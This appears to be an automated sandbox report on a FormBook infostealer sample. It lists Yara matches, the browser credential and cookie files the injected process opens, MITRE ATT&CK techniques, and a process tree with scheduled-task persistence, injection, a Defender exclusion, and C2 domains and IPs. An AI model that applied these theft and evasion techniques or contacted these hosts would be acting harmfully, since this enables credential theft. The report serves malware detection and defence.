            Source: Yara match | File source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix (flattened 14-column table rebuilt per tactic; a number in front of a technique is carried over from the report exactly as shown):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 612 Process Injection; 1 Scheduled Task/Job; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 612 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph (ID: 1481954, Sample: JeouiaPf03mHSBH.exe, Startdate: 25/07/2024, Architecture: WINDOWS, Score: 100), rebuilt as a process tree from the flattened graph text:

            Start
              DNS/IP: www.sabhevillage.online; www.goodneighbor.club; 5 other IPs or domains
              Signatures: Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; Yara detected FormBook; 6 other signatures
              JeouiaPf03mHSBH.exe (7), started
                Dropped: C:\Users\user\AppData\Roaming\snTlRrBza.exe (PE32); C:\Users\...\snTlRrBza.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpA933.tmp (XML); C:\Users\user\...\JeouiaPf03mHSBH.exe.log (ASCII)
                Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
                RegSvcs.exe, started
                  Signatures: Maps a DLL or memory area into another process
                  qRurKwDVhn.exe, injected
                    SearchIndexer.exe (13), started
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      qRurKwDVhn.exe, injected
                        DNS/IP: ancuapengiu28.com 172.96.191.69, ports 49745, 49746, 49747, LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG, Canada; www.lomos.top 162.254.38.5, ports 49753, 49754, 80, COGECO-PEER1CA, United States; 2 other IPs or domains
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      firefox.exe, started
                powershell.exe (23), started
                  Signatures: Loading BitLocker PowerShell Module
                  WmiPrvSE.exe, started
                  conhost.exe, started
                schtasks.exe (1), started
                  conhost.exe, started
              snTlRrBza.exe (5), started
                Signatures: Machine Learning detection for dropped file; Injects a PE file into a foreign processes
                RegSvcs.exe, started
                  qRurKwDVhn.exe, injected
                    Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
                    SearchIndexer.exe, started
                schtasks.exe (1), started
                  conhost.exe, started
                RegSvcs.exe, started
